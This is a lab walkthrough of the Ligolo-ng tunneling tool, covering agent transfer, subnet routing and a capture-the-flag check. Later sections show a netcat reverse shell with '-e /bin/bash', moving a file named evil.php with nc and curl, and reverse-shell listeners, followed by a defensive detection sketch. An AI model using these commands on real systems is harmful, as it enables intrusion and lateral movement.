Tunnel Like a Pro: Secure, Simple, and Efficient!
Ligolo-ng is a cutting-edge tool designed for penetration testers, enabling the creation of secure tunnels using TUN interfaces. It offers a lightweight, fast, and efficient alternative to traditional methods like SOCKS proxies. With features such as easy setup, automatic certificate configuration, and support for multiple platforms, Ligolo-ng simplifies complex tunneling tasks, making it a preferred choice for professionals seeking reliable and secure network tunneling solutions.
-
1
Download the files or use my scripts.
https://github.com/Nicocha30/ligolo-ng
-
2
Let's start the server
proxyloco
_________________________________________________________
AMD64
Ligolo-ng Proxy 0.5.1 Linux
¿Deseas descargar el proxy? [s/N] s
_________________________________________________________
¿Quieres iniciar la interfaz? [s/N] s
[sudo] password for User:
3: ligolo:mtu 1500 qdisc fq_codel state DOWN group default qlen 500
_________________________________________________________
¿Quieres iniciar el proxy? [s/N] s
Iniciando el proxy...
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/
Made in France ♥ by @Nicocha30!
-
3
Download the agent
proxylocomenu
_________________________________________________________
AMD64
1 ligolo-ng Agent 0.5.1 linux
2 ligolo-ng Proxy 0.5.1 linux
ARM64
3 ligolo-ng Agent 0.5.1 linux
4 ligolo-ng Proxy 0.5.1 linux
_________________________________________________________
Choose the number of the download you want: 1
_________________________________________________________
-
4
Transfer the agent to the machine
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.88.159 - - [12/Jul/2024 21:25:44] "GET /agent HTTP/1.1" 200 -
#From the other machine
wget http://192.168.88.13:8000/agent
--2024-07-12 21:25:44--  http://192.168.88.13:8000/agent
Connecting to 192.168.88.13:8000... connected.
HTTP request sent, awaiting response... 200 OK
-
5
Start the agent
./agent -connect 192.168.88.13:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="192.168.88.13:11601"
#on the server:
ligolo-ng » INFO[0229] Agent joined. name=user@domain remote="192.168.88.159:40576"
ligolo-ng » ^C
input Ctrl-c once more to exit
ligolo-ng »
-
6
Server
ligolo-ng » session
[Agent : user@domain] » ifconfig
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ eth0                           │
│ Hardware MAC │ bc:24:11:2e:2a:6c              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.88.159/24              │
│ IPv6 Address │ fe80::be24:11ff:fe2e:2a6c/64   │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────┐
│ Interface 2                           │
├──────────────┬────────────────────────┤
│ Name         │ virbr1                 │
│ Hardware MAC │ 52:54:00:77:e0:cd      │
│ MTU          │ 1500                   │
│ Flags        │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.50.1/24        │
└──────────────┴────────────────────────┘
┌───────────────────────────────────────┐
│ Interface 3                           │
├──────────────┬────────────────────────┤
│ Name         │ docker0                │
│ Hardware MAC │ 02:42:fa:66:f2:43      │
│ MTU          │ 1500                   │
│ Flags        │ up|broadcast|multicast │
│ IPv4 Address │ 172.17.0.1/16          │
└──────────────┴────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 4                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ virbr0                         │
│ Hardware MAC │ 52:54:00:3e:1d:51              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.122.1/24               │
└──────────────┴────────────────────────────────┘
-
6.1
Server terminal - no ligolo
❯ ip a
1: lo:mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: wlan0: mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether a0:59:50:eb:23:64 brd ff:ff:ff:ff:ff:ff
    inet 192.168.88.13/24 brd 192.168.88.255 scope global dynamic noprefixroute wlan0
       valid_lft 86288sec preferred_lft 86288sec
    inet6 fe80::a259:50ff:feeb:2364/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
#make sure ligolo is there.
3: ligolo: mtu 1500 qdisc fq_codel state DOWN group default qlen 500
    link/none
-
6.2
Connect the subnet
sudo ip route add 192.168.122.0/24 dev ligolo
[sudo] password for
#START the session back in ligolo terminal
[Agent : user@domain] » start
[Agent : user@domain] » INFO[1104] Starting tunnel to User@domain
-
7
Check the flag from the server terminal (no ligolo)
❯ curl 192.168.122.205
ligolo-ng flag:1219kj91
❯ ping 192.168.122.205
PING 192.168.122.205 (192.168.122.205) 56(84) bytes of data.
64 bytes from 192.168.122.205: icmp_seq=1 ttl=64 time=8.50 ms
64 bytes from 192.168.122.205: icmp_seq=2 ttl=64 time=11.7 ms
#apache server on the subnet 122
-
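Seen from the defending side, the agent start in step 5 leaves a recognisable command line: a -connect target, certificate validation switched off, and the proxy's default port 11601. The sketch below is an added example (not part of the original walkthrough or of Ligolo-ng) that flags those indicators in process-creation records by matching on arguments rather than the binary name; the records and host names are constructed, and it assumes the agent parses arguments with Go's standard flag package, which also accepts --flag and -flag=value.

```python
import re
import shlex

DEFAULT_PROXY_PORT = "11601"  # from "Listening on 0.0.0.0:11601" in the proxy output

# Constructed process-creation records (hypothetical hosts), as an EDR or auditd feed might give.
SAMPLE_EVENTS = [
    ("web01", "./agent -connect 192.168.88.13:11601 -ignore-cert"),
    ("web01", "/tmp/.x --connect=10.9.8.7:443 --ignore-cert"),  # renamed binary, other port
    ("web01", "wget http://192.168.88.13:8000/agent"),
    ("db01", "openssl s_client -connect 192.168.88.13:443"),    # benign look-alike
]

def go_flags(cmdline):
    """Parse argv like Go's flag package: -f v, --f v, -f=v; stop at first non-flag."""
    argv = shlex.split(cmdline)[1:]
    flags, i = {}, 0
    while i < len(argv):
        m = re.fullmatch(r"--?([A-Za-z][\w-]*)(?:=(.*))?", argv[i])
        if not m:
            break  # a positional argument ends flag parsing (why the openssl line is clean)
        name, value = m.group(1), m.group(2)
        if value is None and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
            i += 1
            value = argv[i]
        flags[name] = True if value is None else value
        i += 1
    return flags

def classify(cmdline):
    """Return the indicators a command line matches (empty list if none)."""
    flags = go_flags(cmdline)
    target = flags.get("connect")
    if not isinstance(target, str) or not re.fullmatch(r".+:\d+", target):
        return []
    hits = ["tunnel-agent-connect"]
    if "ignore-cert" in flags:
        hits.append("tls-validation-disabled")
    if target.rsplit(":", 1)[1] == DEFAULT_PROXY_PORT:
        hits.append("default-proxy-port")
    return hits

def scan(events):
    """Keep only the events that matched at least one indicator."""
    return [(host, cmd, hits) for host, cmd in events if (hits := classify(cmd))]

if __name__ == "__main__":
    for host, cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)} <- {cmd}")
```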
1
Start nc on the proxy server machine
ncat -lvnp 1234 --keep-open #also nc -lvnp 1234
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
-
2
On the machine, connect nc to the agent IP, not to the proxy server
nc 192.168.220.1 1234 -e /bin/bash
ip r
192.168.220.0/24 dev enp1s0 proto kernel scope link src 192.168.220.234
-
1
#[Agent : User@Domain] » listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
[Agent : User@Domain] » listener_list
┌────────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Active listeners                                                                                       │
├───┬────────────────────────────────────────┬─────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT                                  │ NETWORK │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼────────────────────────────────────────┼─────────┼────────────────────────┼────────────────────────┤
│ 0 │ #1 - User@Domain - 192.168.88.13:34288 │ tcp     │ 0.0.0.0:30000          │ 127.0.0.1:10000        │
│ 1 │ #1 - User@Domain - 192.168.88.13:34288 │ tcp     │ 192.168.220.1:30001    │ 127.0.0.1:10001        │
│ 2 │ #1 - User@Domain - 192.168.88.13:34288 │ tcp     │ 192.168.220.1:1234     │ 127.0.0.1:1234         │
│ 3 │ #1 - User@Domain - 192.168.88.13:34288 │ tcp     │ 0.0.0.0:8080           │ 127.0.0.1:80           │
└───┴────────────────────────────────────────┴─────────┴────────────────────────┴────────────────────────┘
But we can also use the same port 1234 from the last connection
-
2
On Kali
python3 -m http.server 1234
curl -O 192.168.220.1:1234/test
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100     6  100     6    0     0    742      0 --:--:-- --:--:-- --:--:--   750
❯ ls
test
wget http://192.168.220.1:1234/test
--2024-07-12 23:28:39--  http://192.168.220.1:1234/test
Connecting to 192.168.220.1:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6 [application/octet-stream]
Saving to: ‘test.1’
test.1 100%[==========================================================>] 6 --.-KB/s in 0s
2024-07-12 23:28:39 (573 KB/s) - ‘test.1’ saved [6/6]
❯ ls
test test.1
-
3
Using nc to send files
#kali
nc -nlvp 1234 < evil.php
Listening on 0.0.0.0 1234
#on the other machine
nc -nv 192.168.220.1 1234 > evil.php
(UNKNOWN) [192.168.220.1] 1234 (?) open
❯ ls
evil.php
-
4
Using python script
#kali (I had to change the port in the script to 1234)
❯ getpython
#to receive files with Python 2, from the other machine, do a curl like this: #generic message
#curl -T file http://192.168.88.19:8000 #generic message
#on the other machine remember to use the IP from the client, not Kali
curl -T evil.php 192.168.220.1:1234
curl: (52) Empty reply from server
#back on Kali
Host: 192.168.220.1:1234
User-Agent: curl/7.88.1
Accept: */*
Content-Length: 9
Expect: 100-continue
❯ ls
evil.php
Listener on the agent for reverse shell
[Agent : user@Domain] » listener_add --addr 192.168.220.1:1234 --to 127.0.0.1:1234 --tcp
INFO[0418] Listener 0 created on remote agent!
Setting a server to transfer files
Adding a listener
Ready, enjoy.